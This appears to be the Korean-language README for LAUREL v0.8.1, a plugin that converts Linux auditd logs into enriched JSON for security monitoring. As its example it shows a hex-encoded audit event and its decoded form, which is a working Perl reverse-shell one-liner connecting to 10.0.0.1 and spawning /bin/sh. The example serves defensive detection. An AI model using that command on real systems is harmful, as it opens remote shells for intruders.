
laurel v0.8.1
Linux 감사 로그를 SIEM 사용에 맞게 변환
Linux Audit – 사용 가능하고, 견고하며, 쉬운 로깅
LAUREL은 _auditd(8)_을 위한 이벤트 후처리 플러그인으로, 현대적인 보안 모니터링 설정에 적합한 유용하고 강화된 JSON 기반 감사 로그를 생성합니다.
최신 안정 릴리스에 해당하는 문서는 여기에서 찾을 수 있습니다.
왜?
TLDR: 다음과 같은 감사 이벤트 대신…
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…
…_LAUREL_은 이를 JSON 로그로 변환하여 공격자/침투 테스터/레드팀이 만들려고 하는 난장판이 한눈에 드러나도록 합니다:
{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}
이는 감사 이벤트가 생성되는 호스트에서 _LAUREL_이 실행되기 때문에 소스에서 발생합니다. 이벤트는 부모 프로세스(ppid)에 대한 유용한 정보로 강화됩니다:
"PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}
문서
구성 및 운영 세부 사항은 laurel(8) 매뉴얼 페이지에 설명되어 있습니다. 로그 형식 및 근거에 대한 자세한 내용은 laurel-about(7) 매뉴얼 페이지에서 확인할 수 있습니다. laurel-audit-rules(7) 페이지에는 공격자의 전술을 탐지하는 데 유용한 감사 규칙 구성에 대한 조언과 예제가 포함되어 있습니다.
LAUREL 설치 지침에는 소스에서 _LAUREL_을 빌드하고 설치 및 구성하는 방법에 대한 지침이 포함되어 있습니다.
우리는 기존 프로젝트 및 제품의 기능 세트와 성능 특성에 만족하지 않았기 때문에 _LAUREL_을 개발했습니다. 자세한 내용은 성능 문서를 참조하십시오.
참고 사항
- ansible-auditd-laurel, auditd + _laurel_을 배포하기 위한 Ansible 역할, @0xFustang / CERT-EU 제작
라이선스
GNU General Public License, version 3
저자
- Hilko Bengen <[email protected]>
- Sergej Schmidt <[email protected]>
로고는 Birgit Meyer <[email protected]>가 만들었습니다.